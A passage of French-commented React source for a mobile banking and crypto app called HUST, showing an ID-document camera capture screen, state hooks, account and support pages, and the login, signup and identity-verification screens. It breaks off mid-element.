    <div className="fixed inset-0 bg-black z-50 flex flex-col">
      {/* Écran de chargement */}
      {isLoading && (
        <div className="fixed inset-0 bg-black z-30 flex items-center justify-center">
          <div className="w-16 h-16 border-4 border-white/20 border-t-white rounded-full animate-spin"></div>
        </div>
      )}
      
      {!showPreview ? (
        <>
          {/* Vue de la caméra */}
          <div className="flex-1 relative">
            <video 
              ref={videoRef} 
              className="w-full h-full object-cover"
              style={{ transform: 'scaleX(-1)' }}  // ← AJOUTEZ ÇA
              autoPlay 
              playsInline 
            />
            <canvas ref={canvasRef} className="hidden" />
            
            {/* Bouton de capture - repositionné plus bas, très proche de l'overlay */}
            <div className="absolute left-1/2 transform -translate-x-1/2" style={{ bottom: '50px' }}>
              <button 
                onClick={capturePhoto} 
                className="w-16 h-16 rounded-full bg-transparent border-2 border-white flex items-center justify-center"
                aria-label="Prendre une photo"
              >
                <div className="w-12 h-12 bg-white rounded-full"></div>
              </button>
            </div>
          </div>
          
          {/* Barre noire en bas avec coins arrondis des deux côtés - réduite en hauteur */}
          <div 
            className="bg-black text-white pt-4 pb-12 px-4" 
            style={{ 
            borderTopLeftRadius: '24px', 
            borderTopRightRadius: '24px',
            height: '110px' // Hauteur réduite pour l'overlay
            }}
          >
            <h3 className="text-lg font-medium text-center">
              {type === 'Recto' 
                ? 'Recto du document d\'identité' 
                : 'Verso du document d\'identité'}
            </h3>
            <p className="text-sm text-gray-400 text-center my-2">
              {type === 'Recto' 
                ? 'Prenez une photo du recto de votre document d\'identité.' 
                : 'Prenez une photo du verso de votre document.'}
            </p>
          </div>
        </>
      ) : (
        <>
          {/* Vue de l'aperçu photo */}
          <div className="flex-1 bg-black">
            <img 
              src={capturedImage} 
              alt="Aperçu" 
              className="w-full h-full object-contain" 
            />
          </div>
          
          {/* Barre noire en bas avec les boutons de confirmation - cette partie reste inchangée */}
          <div 
            className="bg-black text-white pt-4 pb-16 px-4"
          >
            <h3 className="text-lg font-medium text-center mb-2">
              Carte d'identité
            </h3>
            <p className="text-sm text-gray-300 text-center mb-4">
              Assurez-vous que toutes les informations sur le document sont visibles et lisibles
            </p>
            
            {isUploading ? (
              <div className="py-2 px-2 mb-6">
                <div className="text-center mb-2">Téléversement</div>
                <div className="w-full bg-blue-900/30 h-1 rounded-full overflow-hidden">
                  <div className="h-full bg-blue-600 rounded-full animate-pulse" style={{width: '100%'}}></div>
                </div>
              </div>
            ) : (
              <div className="px-2 flex flex-col space-y-3 mb-4">
                <button 
                  onClick={confirmPhoto} 
                  className="w-full bg-violet-600 text-white py-3 rounded-xl font-medium"
                >
                  Le document est lisible
                </button>
                <button 
                  onClick={retakePhoto} 
                  className="w-full bg-gray-600 text-white py-3 rounded-xl font-medium"
                >
                  Reprendre la photo
                </button>
                <div className="text-center text-gray-500 text-xs mt-1">
                  Avec la technologie Sumsub
                </div>
              </div>
            )}
          </div>
        </>
      )}
    </div>
  );
};
    
      
      
      
   

  
            
      
      
      
      

   
                   
        
  
                
      
      
       
  




 
// Fonction pour réinitialiser tous les documents et l'état vidéo
const resetAllDocuments = () => {
  setDocuments({
    Recto: null,
    Verso: null,
    VideoSelfie: null
  });
  setVideoStage('initial');
};




useEffect(() => {
  const setStatusBarForPage = () => {
    switch (currentPage) {
      case 'login':
      case 'signup-step1':
      case 'signup-step2':
      case 'signup-step3':
      case 'welcome':
      case 'verification':
        // Violet foncé pour les pages d'authentification
        updateStatusBarColor('#4C1D95'); // violet-900
        break;
      case 'accounts':
        if (activeTab === 'accounts') {
          updateStatusBarColor('#5B21B6'); // Violet pour comptes
        } else if (activeTab === 'cards') {
          updateStatusBarColor('#5723B5'); // Variente pour cartes
        } else if (activeTab === 'transfers') {
          updateStatusBarColor('#5925B8'); // Variante pour virements
        } else if (activeTab === 'settings') {
          updateStatusBarColor('#5521B4'); // Violet pour paramètres
        }
        break;
      case 'loading':
        // Noir pour l'écran de chargement
        updateStatusBarColor('#000000');
        break;
      default:
        // Couleur par défaut
        updateStatusBarColor('#5B21B6');
    }
  };

  setStatusBarForPage();
}, [currentPage, activeTab]);


// Verrouiller l'orientation en portrait
useEffect(() => {
  if (Capacitor.isNativePlatform()) {
    ScreenOrientation.lock({ orientation: 'portrait' });
  }
}, []);


useEffect(() => {
  const loadExchangeRates = async () => {
    const result = await fetchExchangeRates();
    if (result.success) {
      setExchangeRates(result.rates);
    }
  };
  loadExchangeRates();
}, []);

                  

// Effet pour précharger la caméra dès l'arrivée sur la page de vérification
useEffect(() => {
  if (currentPage === 'verification') {
    // Précharger la caméra à l'avance
    preloadCamera();
  }
}, [currentPage]);

// Effet pour injecter les styles CSS et initialiser la caméra
useEffect(() => {
  injectStyles();
}, []);

// Effet pour réinitialiser les documents lorsqu'on arrive sur la page de vérification
useEffect(() => {
  if (currentPage === 'verification') {
    resetAllDocuments();
  }
}, [currentPage]);

// Effet pour initialiser la caméra lorsque videoStage change
useEffect(() => {
  if (videoStage === 'preparation') {
    // Initialiser la caméra dès que la page est chargée
    initializeCameraPreview();
    
    // Fonction de nettoyage qui s'exécute lorsque le composant est démonté
    return () => {
      if (window.currentMediaStream) {
        window.currentMediaStream.getTracks().forEach(track => track.stop());
      }
    };
  }
}, [videoStage]);



// Effet pour l'animation du statut d'envoi
useEffect(() => {
  if (showConfirmation) {
    setAnimationActive(false);
    setConfirmationState('completed');
    
    const animationTimer = setTimeout(() => {
      setAnimationActive(false);
    }, 4000);
    
    const stateTimer = setTimeout(() => {
      setConfirmationState('completed');
    }, 4000);
    
    return () => {
      clearTimeout(animationTimer);
      clearTimeout(stateTimer);
    };
  }
}, [showConfirmation]);





useEffect(() => {
  if (userDetails) {
    // Charger l'historique depuis userDetails
    setTransactionHistory(userDetails.transactionHistory || []);
  }
}, [userDetails]);



// Mettre à jour le prix quand on change de crypto
useEffect(() => {
  if (showSwapPage && swapFromAsset) {
    fetchCryptoPrice(swapFromAsset.symbol).then(price => {
      setSwapCryptoPrice(price);
      // Recalculer l'estimation
      if (swapAmount) {
        const estimated = parseFloat(swapAmount) * price * 0.995; // -0.5% frais
        setSwapEstimatedHust(estimated.toFixed(2));
      }
    });
  }
}, [showSwapPage, swapFromAsset]);

// Mettre à jour l'estimation quand le montant change
useEffect(() => {
  if (swapAmount && swapCryptoPrice) {
    const estimated = parseFloat(swapAmount) * swapCryptoPrice * 0.995;
    setSwapEstimatedHust(estimated.toFixed(2));
  } else {
    setSwapEstimatedHust('0.00');
  }
}, [swapAmount, swapCryptoPrice]);












useEffect(() => {
  if (balanceRefreshKey > 0) {
    // Force un re-render immédiat
    forceUpdate({});
  }
}, [balanceRefreshKey]);










  useEffect(() => {
    if (isLoading) {
      const progressInterval = setInterval(() => {
      setProgress(prev => Math.min(prev + 10, 100));
    }, 1000);
      
      const timer = setTimeout(() => {
        setIsLoading(false);
        setCurrentPage('accounts');
      }, 10000);
      
      return () => {
        clearInterval(progressInterval); // Ajouter cette ligne
        clearTimeout(timer);
      };
    }
  }, [isLoading]);
 
   useEffect(() => {
    // 🆕 Ne plus restaurer userData automatiquement
    localStorage.removeItem('userData');
    ensureAppleDemoAccount();
}, []); 
   
   // Récupérer les intérêts calculés automatiquement par le serveur
  useEffect(() => {
    const fetchUserData = async () => {
      if (userDetails && userDetails.email && !interestRecalculated) {
        try {
          const response = await fetch(`${SERVER_URL}/api/users/${userDetails.email}`);
          if (response.ok) {
            const result = await response.json();
            if (result.success) {
              setUserDetails(result.user);
              setInterestRecalculated(true);
            }
          }
        } catch (error) {
          console.error('❌ Erreur récupération données:', error);
        }
      }
    };
    
    fetchUserData();
  }, [userDetails?.email]);   

useEffect(() => {
  // Réinitialiser les erreurs de formulaire lors du changement de page
  setFormError('');
}, [currentPage]);

// Composant pour la page de paramètres du compte
const AccountSettingsPage = ({ onBack }) => {
  // Utiliser les vraies données utilisateur au lieu de données statiques
  const userInitials = userDetails ? 
    (userDetails.firstName?.charAt(0) || '') + (userDetails.lastName?.charAt(0) || '') : 
    "UN";

  
  return (
    <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white">
      {/* Bouton de retour */}
      <div className="pt-12 px-4 pb-4">
        <button 
          className="text-white" 
          onClick={onBack}
        >
          <ArrowLeft size={28} />
        </button>
      </div>
      
      {/* Avatar */}
      <div className="flex flex-col items-center mt-2 mb-5">
        <div className="w-20 h-20 rounded-full bg-violet-400 flex items-center justify-center mb-2">
          <span className="text-white text-xl font-bold">{userInitials}</span>
        </div>
      </div>
      
      {/* Formulaire */}
      <div className="px-4 space-y-3">
        {/* Prénom */}
        <div className="bg-gray-800/50 backdrop-blur-sm p-3 rounded-lg">
          <label className="text-gray-400 text-xs block mb-1">PRÉNOM</label>
          <input 
            type="text"
            className="bg-transparent text-white w-full outline-none text-base"
            value={userDetails?.firstName || ""}
            readOnly
          />
        </div>
        
        {/* Nom */}
        <div className="bg-gray-800/50 backdrop-blur-sm p-3 rounded-lg">
          <label className="text-gray-400 text-xs block mb-1">NOM</label>
          <input 
            type="text"
            className="bg-transparent text-white w-full outline-none text-base"
            value={userDetails?.lastName || ""}
            readOnly
          />
        </div>
        
        {/* Téléphone */}
        <div className="bg-gray-800/50 backdrop-blur-sm p-3 rounded-lg">
          <label className="text-gray-400 text-xs block mb-1">TÉLÉPHONE</label>
          <input 
            type="tel"
            className="bg-transparent text-white w-full outline-none text-base"
            value={userDetails?.phoneCountry && userDetails?.phone ? 
  `+${
    userDetails.phoneCountry === 'FR' ? '33' :
    userDetails.phoneCountry === 'BE' ? '32' :
    userDetails.phoneCountry === 'CH' ? '41' :
    userDetails.phoneCountry === 'DE' ? '49' :
    userDetails.phoneCountry === 'US' ? '1' :
    userDetails.phoneCountry === 'CA' ? '1' :
    userDetails.phoneCountry === 'GB' ? '44' :
    userDetails.phoneCountry === 'SG' ? '65' :
    userDetails.phoneCountry === 'ZA' ? '27' :
    userDetails.phoneCountry === 'AR' ? '54' :
    userDetails.phoneCountry === 'AU' ? '61' :
    userDetails.phoneCountry === 'AT' ? '43' :
    userDetails.phoneCountry === 'BR' ? '55' :
    userDetails.phoneCountry === 'BG' ? '359' :
    userDetails.phoneCountry === 'CY' ? '357' :
    userDetails.phoneCountry === 'KR' ? '82' :
    userDetails.phoneCountry === 'HR' ? '385' :
    userDetails.phoneCountry === 'DK' ? '45' :
    userDetails.phoneCountry === 'ES' ? '34' :
    userDetails.phoneCountry === 'EE' ? '372' :
    userDetails.phoneCountry === 'FI' ? '358' :
    userDetails.phoneCountry === 'GR' ? '30' :
    userDetails.phoneCountry === 'HK' ? '852' :
    userDetails.phoneCountry === 'HU' ? '36' :
    userDetails.phoneCountry === 'IE' ? '353' :
    userDetails.phoneCountry === 'IS' ? '354' :
    userDetails.phoneCountry === 'IT' ? '39' :
    userDetails.phoneCountry === 'JP' ? '81' :
    userDetails.phoneCountry === 'LV' ? '371' :
    userDetails.phoneCountry === 'LT' ? '370' :
    userDetails.phoneCountry === 'LU' ? '352' :
    userDetails.phoneCountry === 'MT' ? '356' :
    userDetails.phoneCountry === 'MX' ? '52' :
    userDetails.phoneCountry === 'NO' ? '47' :
    userDetails.phoneCountry === 'NZ' ? '64' :
    userDetails.phoneCountry === 'NL' ? '31' :
    userDetails.phoneCountry === 'PL' ? '48' :
    userDetails.phoneCountry === 'PT' ? '351' :
    userDetails.phoneCountry === 'CZ' ? '420' :
    userDetails.phoneCountry === 'RO' ? '40' :
    userDetails.phoneCountry === 'SK' ? '421' :
    userDetails.phoneCountry === 'SI' ? '386' :
    userDetails.phoneCountry === 'SE' ? '46' :
    userDetails.phoneCountry === 'AE' ? '971' : '33'
  } ${userDetails.phone}` : 
  "+33 X XX XX XX"}
            readOnly
          />
        </div>
        
        {/* Email */}
        <div className="bg-gray-800/50 backdrop-blur-sm p-3 rounded-lg">
          <label className="text-gray-400 text-xs block mb-1">EMAIL</label>
          <input 
            type="email"
            className="bg-transparent text-white w-full outline-none text-base"
            value={userDetails?.email || ""}
            readOnly
          />
        </div>
      </div>
      
      {/* Espace vide supplémentaire */}
      <div className="h-80"></div>
    </div>
  );
};

// Composant pour la page de contact du support
const ContactSupportPage = ({ onBack }) => {
  const [message, setMessage] = useState('');
  
  return (
    <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white">
      {/* Bouton de retour */}
      <div className="pt-12 px-4 pb-4">
        <button 
          className="text-white" 
          onClick={onBack}
        >
          <ArrowLeft size={28} />
        </button>
      </div>
      
      {/* Titre et description */}
      <div className="px-4 mt-2 mb-4">
        <h1 className="text-xl font-medium mb-2">Comment pouvons-nous vous aider ?</h1>
        <p className="text-white/80 text-sm">
          N'hésitez pas à détailler votre demande. Vous recevrez une réponse rapidement par email.
        </p>
      </div>
      
      {/* Formulaire avec textarea et bouton attaché */}
      <div className="px-4 mb-4">
        {/* Zone de texte */}
        <textarea
          className="w-full h-64 bg-gray-800/50 backdrop-blur-sm p-3 rounded-t-lg text-white resize-none outline-none text-base border-b border-gray-700"
          placeholder="Dites-nous tout !"
          value={message}
          onChange={(e) => setMessage(e.target.value)}
        />
        
        {/* Bouton envoyer - directement attaché sous la zone de texte */}
        <button 
          className="w-full py-3 bg-gray-200 text-gray-500 rounded-b-lg font-medium text-base disabled:opacity-50"
          disabled={!message.trim()}
          onClick={() => {
            // Logique d'envoi du formulaire
            if (message.trim()) {
              alert("Message envoyé");
              setMessage('');
            }
          }}
        >
          Envoyer
        </button>
      </div>
      
      {/* Espace vide supplémentaire sous le formulaire */}
      <div className="h-80"></div>
    </div>
  );
};

// Vérifier d'abord si nous devons afficher le SplashScreen
if (showSplash) {
  return <SplashScreen onComplete={() => setShowSplash(false)} />;
}

  // Gestion des différentes pages
  if (isLoading) {
    return (
      <div className="min-h-screen flex items-center justify-center bg-gradient-to-br from-violet-900 via-violet-800 to-black">
        <div className="relative">
          <div className="w-20 h-20 border-4 border-white/20 border-t-white rounded-full animate-spin" />
          <div className="absolute top-1/2 left-1/2 transform -translate-x-1/2 -translate-y-1/2">
            <svg className="w-8 h-8 text-white animate-pulse" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M5 13l4 4L19 7" />
            </svg>
          </div>
        </div>
      </div>
    );
  }

  // Pages d'inscription et connexion
  switch (currentPage) {
    case 'login':
      return (
        <div className="flex flex-col items-center justify-center min-h-screen p-4 bg-gradient-to-br from-violet-900 via-violet-800 to-black">
          <div className="bg-black/30 p-6 rounded-2xl mb-12">
            <h1 className="text-5xl font-bold tracking-wider text-white italic">HUST</h1>
          </div>
          {/* Insérez le code du message d'erreur ici */}
  {loginError && (
    <div className="w-full max-w-sm mb-4 bg-black/40 backdrop-blur-lg p-4 rounded-lg flex items-center shadow-md">
      <div className="w-6 h-6 mr-3">
        <svg className="w-6 h-6 text-violet-400" fill="none" stroke="currentColor" viewBox="0 0 24 24">
          <circle cx="12" cy="12" r="10" strokeWidth="2" />
          <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M12 8v4M12 16h.01" />
        </svg>
      </div>
      <p className="text-white text-sm">Compte non existant ou mot de passe incorrect.</p>
    </div>
  )}          
          <form onSubmit={handleLogin} className="w-full max-w-sm space-y-4">
            <input 
              type="email"
              name="email"
              value={formData.email}
              onChange={handleInputChange}
              placeholder="Email"
              className="w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border border-white/20"
            />
            <input 
              type="password"
              name="password"
              value={formData.password}
              onChange={handleInputChange}
              placeholder="Mot de passe"
              className="w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border border-white/20"
            />
            <button 
              type="submit"
              className="w-full bg-white text-black py-4 rounded-lg font-medium hover:bg-violet-100 transition-colors"
            >
              Se connecter
            </button>
            <p className="text-center text-white">
              Vous n'avez pas de compte ?{' '}
              <button 
                type="button"
                onClick={() => {resetAllFormData();
                               setCurrentPage('signup-step1');
                }}
                className="text-violet-300 underline"
              >
                Créez un compte !
              </button>
            </p>
          </form>
        </div>
      );

    case 'signup-step1':
      return (
        <div className="flex flex-col items-center justify-center min-h-screen p-4 bg-gradient-to-br from-violet-900 via-violet-800 to-black">
          <div className="bg-black/30 p-6 rounded-2xl mb-12">
            <h1 className="text-5xl font-bold tracking-wider text-white italic">HUST</h1>
          </div>
          
          <form onSubmit={handleSignUp1} className="w-full max-w-sm space-y-4">
            <input 
              type="text"
              name="fullName"
              value={formData.fullName}
              onChange={handleInputChange}
              placeholder="Nom d'utilisateur"
              className="w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border border-white/20"
            />
            <input 
              type="email"
              name="email"
              value={formData.email}
              onChange={handleInputChange}
              placeholder="Email"
              className="w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border border-white/20"
            />
            <div>
              <input 
                type="password"
                name="password"
                value={formData.password}
                onChange={handleInputChange}
                placeholder="Mot de passe"
                className="w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border border-white/20"
              />
              <p className="text-red-500 text-sm mt-1">Minimum 8 caractères dont au moins 1 chiffre et 1 caractère spécial (!@#$%^&*)</p>
            </div>
            <div>
              <input 
                type="password"
                name="confirmPassword"
                value={formData.confirmPassword}
                onChange={handleInputChange}
                placeholder="Confirmer le mot de passe"
                className="w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border border-white/20"
              />
              <p className="text-red-500 text-sm mt-1">Minimum 8 caractères dont au moins 1 chiffre et 1 caractère spécial (!@#$%^&*)</p>
            </div>
            {/* Afficher le message d'erreur */}
            {formError && (
            <div className="flex items-center bg-white/10 backdrop-blur-sm p-3 rounded-lg mb-4 border border-red-500">
            <div className="flex-shrink-0 w-8 h-8 bg-red-500 rounded-full flex items-center justify-center mr-3">
            <svg className="w-5 h-5 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
           <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M6 18L18 6M6 6l12 12" />
          </svg>
         </div>
       <p className="text-white">{formError}</p>
     </div>
   )}
            <button 
              type="submit"
              className="w-full bg-white text-black py-4 rounded-lg font-medium hover:bg-violet-100 transition-colors"
            >
              Créer un compte
            </button>
            <p className="text-center text-white">
              Déjà un compte ?{' '}
              <button 
                type="button"
                onClick={() => setCurrentPage('login')}
                className="text-violet-300 underline"
              >
                Se connecter
              </button>
            </p>
          </form>
        </div>
      );

    case 'signup-step2':
      return (
        <div className="flex flex-col min-h-screen p-4 bg-gradient-to-br from-violet-900 via-violet-800 to-black" style={{ paddingTop: '60px' }}>
          <button 
            onClick={() => setCurrentPage('signup-step1')} 
            className="text-white mb-6"
          >
            <ArrowLeft className="w-6 h-6" />
          </button>
          
          <form onSubmit={handleSignUp2} className="flex-1">
            <h2 className="text-2xl font-bold text-white mb-8">Informations personnelles</h2>
            <div className="w-full max-w-sm space-y-4">
              <input 
                type="text"
                name="lastName"
                value={formData.lastName}
                onChange={handleInputChange}
                placeholder="Nom"
                className="w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border border-white/20"
                required
              />
              <input 
                type="text"
                name="firstName"
                value={formData.firstName}
                onChange={handleInputChange}
                placeholder="Prénom"
                className="w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border border-white/20"
                required
              />
              
              <div className="space-y-2">
                <label className="text-white text-sm">Date de naissance</label>
                <div className="flex gap-2">
                  <input 
                    type="text"
                    name="birthDay"
                    value={formData.birthDay}
                    onChange={(e) => {
                      const value = e.target.value.replace(/[^0-9]/g, '');
                      if (value.length <= 2) {
                        handleInputChange({
                          target: { name: 'birthDay', value }
                        });
                      }
                    }}
                    placeholder="JJ"
                    maxLength="2"
                    className={`w-16 bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border ${dateError ? 'border-red-500' : 'border-white/20'}`}
                    required
                  />
                  <input 
                    type="text"
                    name="birthMonth"
                    value={formData.birthMonth}
                    onChange={(e) => {
                      const value = e.target.value.replace(/[^0-9]/g, '');
                      if (value.length <= 2) {
                        handleInputChange({
                          target: { name: 'birthMonth', value }
                        });
                      }
                    }}
                    placeholder="MM"
                    maxLength="2"
                    className={`w-16 bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border ${dateError ? 'border-red-500' : 'border-white/20'}`}
                    required
                  />
                  <input 
                    type="text"
                    name="birthYear"
                    value={formData.birthYear}
                    onChange={(e) => {
                      const value = e.target.value.replace(/[^0-9]/g, '');
                      if (value.length <= 4) {
                        handleInputChange({
                          target: { name: 'birthYear', value }
                        });
                      }
                    }}
                    placeholder="AAAA"
                    maxLength="4"
                    className={`w-28 bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border ${dateError ? 'border-red-500' : 'border-white/20'}`}
                    required
                  />
                </div>
                {dateError && (
                  <p className="text-red-500 text-sm mt-1">{dateError}</p>
                )}
              </div>
              
              <input 
                type="text"
                name="address"
                value={formData.address}
                onChange={handleInputChange}
                placeholder="Adresse de résidence actuelle"
                className={`w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border ${addressError ? 'border-red-500' : 'border-white/20'}`}
                required
              />
              {addressError && (
                <p className="text-red-500 text-sm mt-1">{addressError}</p>
              )}
              
              <div className="flex gap-2">
                <div className="relative w-1/3">
                  <input 
                    type="text"
                    name="postalCode"
                    value={formData.postalCode}
                    onChange={(e) => {
                      const value = e.target.value.replace(/[^0-9]/g, '');
                      if (value.length <= 5) {
                        handleInputChange({
                          target: { name: 'postalCode', value }
                        });
                      }
                    }}
                    placeholder="Code postal"
                    className={`w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border ${postalError ? 'border-red-500' : 'border-white/20'}`}
                  />
                  {postalError && (
                    <p className="absolute text-red-500 text-sm mt-1">{postalError}</p>
                  )}
                </div>
                <input 
                  type="text"
                  name="city"
                  value={formData.city}
                  onChange={handleInputChange}
                  placeholder="Ville"
                  className={`w-1/3 bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border ${cityError ? 'border-red-500' : 'border-white/20'}`}
                  required
                />
                {cityError && (
                  <p className="text-red-500 text-sm mt-1">{cityError}</p>
                )}
                <select
                  name="country"
                  value={formData.country}
                  onChange={handleInputChange}
                  className="w-1/3 bg-white/10 text-white p-4 rounded-lg border border-white/20"
                  required
                >
                  <option value="" disabled hidden>Pays</option>
{/* Pays populaires */}
<option value="FR">🇫🇷 France</option>
<option value="US">🇺🇸 États-Unis</option>
<option value="GB">🇬🇧 Royaume-Uni</option>
<option value="CH">🇨🇭 Suisse</option>
<option value="BE">🇧🇪 Belgique</option>
<option value="CA">🇨🇦 Canada</option>
<option value="SG">🇸🇬 Singapour</option>
{/* Séparateur visuel */}
<option disabled>──────────</option>
{/* Reste alphabétique */}
<option value="ZA">🇿🇦 Afrique du Sud</option>
<option value="DE">🇩🇪 Allemagne</option>
<option value="AR">🇦🇷 Argentine</option>
<option value="AU">🇦🇺 Australie</option>
<option value="AT">🇦🇹 Autriche</option>
<option value="BR">🇧🇷 Brésil</option>
<option value="BG">🇧🇬 Bulgarie</option>
<option value="CY">🇨🇾 Chypre</option>
<option value="KR">🇰🇷 Corée du Sud</option>
<option value="HR">🇭🇷 Croatie</option>
<option value="DK">🇩🇰 Danemark</option>
<option value="ES">🇪🇸 Espagne</option>
<option value="EE">🇪🇪 Estonie</option>
<option value="FI">🇫🇮 Finlande</option>
<option value="GR">🇬🇷 Grèce</option>
<option value="HK">🇭🇰 Hong Kong</option>
<option value="HU">🇭🇺 Hongrie</option>
<option value="IE">🇮🇪 Irlande</option>
<option value="IS">🇮🇸 Islande</option>
<option value="IT">🇮🇹 Italie</option>
<option value="JP">🇯🇵 Japon</option>
<option value="LV">🇱🇻 Lettonie</option>
<option value="LT">🇱🇹 Lituanie</option>
<option value="LU">🇱🇺 Luxembourg</option>
<option value="MT">🇲🇹 Malte</option>
<option value="MX">🇲🇽 Mexique</option>
<option value="NO">🇳🇴 Norvège</option>
<option value="NZ">🇳🇿 Nouvelle-Zélande</option>
<option value="NL">🇳🇱 Pays-Bas</option>
<option value="PL">🇵🇱 Pologne</option>
<option value="PT">🇵🇹 Portugal</option>
<option value="CZ">🇨🇿 République tchèque</option>
<option value="RO">🇷🇴 Roumanie</option>
<option value="SK">🇸🇰 Slovaquie</option>
<option value="SI">🇸🇮 Slovénie</option>
<option value="SE">🇸🇪 Suède</option>
<option value="AE">🇦🇪 Émirats arabes unis</option>
                </select>
                {countryError && (
                  <p className="text-red-500 text-sm mt-1">{countryError}</p>
                )}
              </div>
              <button 
                type="submit"
                className="w-full bg-white text-black py-4 rounded-lg font-medium hover:bg-violet-100 transition-colors"
              >
                Continuer
              </button>
            </div>
          </form>
        </div>
      );

    case 'signup-step3':
      return (
        <div className="flex flex-col min-h-screen p-4 bg-gradient-to-br from-violet-900 via-violet-800 to-black" style={{ paddingTop: '60px' }}>
          <button 
            onClick={() => setCurrentPage('signup-step2')} 
            className="text-white mb-6"
          >
            <ArrowLeft className="w-6 h-6" />
          </button>
          
          <form onSubmit={handleSignUp3} className="flex-1">
            <h2 className="text-2xl font-bold text-white mb-8">Dernière étape</h2>
            <div className="w-full max-w-sm space-y-4">
              <div className="flex gap-2">
                <div className="w-28 flex-shrink-0">
                  <select
                    required
                    value={phoneCountry}
                    onChange={(e) => {
                      setPhoneCountry(e.target.value);
                      setPhoneError('');
                    }}
                    className={`w-28 bg-white/10 text-white p-4 rounded-lg border ${phoneError ? 'border-red-500' : 'border-white/20'} appearance-none`}
                  >
                    <option value="" disabled hidden>Pays</option>
{/* Pays populaires */} 
<option value="FR">🇫🇷 +33</option>
<option value="US">🇺🇸 +1</option>
<option value="GB">🇬🇧 +44</option>
<option value="CH">🇨🇭 +41</option>
<option value="BE">🇧🇪 +32</option>
<option value="CA">🇨🇦 +1</option>
<option value="SG">🇸🇬 +65</option>
{/* Séparateur visuel */}
<option disabled>──────────</option>
{/* Reste alphabétique */}
<option value="ZA">🇿🇦 +27</option>
<option value="DE">🇩🇪 +49</option>
<option value="AR">🇦🇷 +54</option>
<option value="AU">🇦🇺 +61</option>
<option value="AT">🇦🇹 +43</option>
<option value="BR">🇧🇷 +55</option>
<option value="BG">🇧🇬 +359</option>
<option value="CY">🇨🇾 +357</option>
<option value="KR">🇰🇷 +82</option>
<option value="HR">🇭🇷 +385</option>
<option value="DK">🇩🇰 +45</option>
<option value="ES">🇪🇸 +34</option>
<option value="EE">🇪🇪 +372</option>
<option value="FI">🇫🇮 +358</option>
<option value="GR">🇬🇷 +30</option>
<option value="HK">🇭🇰 +852</option>
<option value="HU">🇭🇺 +36</option>
<option value="IE">🇮🇪 +353</option>
<option value="IS">🇮🇸 +354</option>
<option value="IT">🇮🇹 +39</option>
<option value="JP">🇯🇵 +81</option>
<option value="LV">🇱🇻 +371</option>
<option value="LT">🇱🇹 +370</option>
<option value="LU">🇱🇺 +352</option>
<option value="MT">🇲🇹 +356</option>
<option value="MX">🇲🇽 +52</option>
<option value="NO">🇳🇴 +47</option>
<option value="NZ">🇳🇿 +64</option>
<option value="NL">🇳🇱 +31</option>
<option value="PL">🇵🇱 +48</option>
<option value="PT">🇵🇹 +351</option>
<option value="CZ">🇨🇿 +420</option>
<option value="RO">🇷🇴 +40</option>
<option value="SK">🇸🇰 +421</option>
<option value="SI">🇸🇮 +386</option>
<option value="SE">🇸🇪 +46</option>
<option value="AE">🇦🇪 +971</option>
                  </select>
                </div>

                <div className="relative flex-1">
                  <input 
                    type="tel"
                    name="phone"
                    value={formData.phone}
                    onChange={(e) => {
                      const value = e.target.value.replace(/[^0-9]/g, '');
                      const maxLength = phoneCountry ? phoneFormats[phoneCountry].length + 1 : 15;
                      if (value.length <= maxLength) {
                        handleInputChange({
                          target: { name: 'phone', value }
                        });
                      }
                    }}
                    placeholder={phoneCountry ? `Exemple: ${phoneFormats[phoneCountry].example}` : "Numéro de téléphone"}
                    className={`w-full bg-white/10 text-white p-4 rounded-lg placeholder-gray-400 border ${phoneError ? 'border-red-500' : 'border-white/20'}`}
                  />
                  {phoneError && (
                    <p className="absolute text-red-500 text-sm mt-1">{phoneError}</p>
                  )}
                </div>
              </div>

              <button 
                type="submit"
                className="w-full bg-white text-black py-4 rounded-lg font-medium hover:bg-violet-100 transition-colors"
              >
                Continuer vers la vérification
              </button>
            </div>
          </form>
       
       </div>
      );






    case 'welcome':
      return (
        <div className="min-h-screen flex flex-col items-center justify-center p-4 bg-gradient-to-br from-violet-900 via-violet-800 to-black">
          <div className="bg-black/30 p-6 rounded-2xl mb-12">
            <h1 className="text-5xl font-bold italic tracking-wider text-white">HUST</h1>
          </div>
          <div className="w-full max-w-sm">
            <button 
              onClick={() => setCurrentPage('verification')}
              className="w-full bg-white text-black py-4 rounded-lg font-medium hover:bg-violet-100 transition-colors"
            >
              Commencer la vérification d'identité
            </button>
          </div>
        </div>
      );

    case 'verification':
      return (
    <div className="min-h-screen p-4 bg-gradient-to-br from-violet-900 via-violet-800 to-black">
      <button 
        onClick={() => setCurrentPage('welcome')}
        className="text-white mb-2 flex items-center justify-center gap-1 hidden"
      >
        <span>←</span> Retour
      </button>
      
      <h2 className="text-xl font-bold text-white mb-2 mt-16">Vérification d'identité</h2>
      <p className="text-gray-300 mb-4">Chargez vos documents d'identité et effectuez une vérification par vidéo</p>
      
      {/*
      <div className="mb-4">
        <button 
          onClick={() => setShowSumsubTest(true)}
          className="w-full bg-yellow-500 text-black py-3 rounded-lg font-bold"
        >
          🧪 TESTER SUMSUB (15 jours gratuits)
        </button>
        <p className="text-white/60 text-xs text-center mt-2">
          Comparer avec Sumsub
        </p>
      </div>
      */}

      
      {/* 🆕 AJOUTER TOUT CE BLOC ICI */}
{/* Dropdown Type de Document */}
<div className="relative mb-4">
  <button
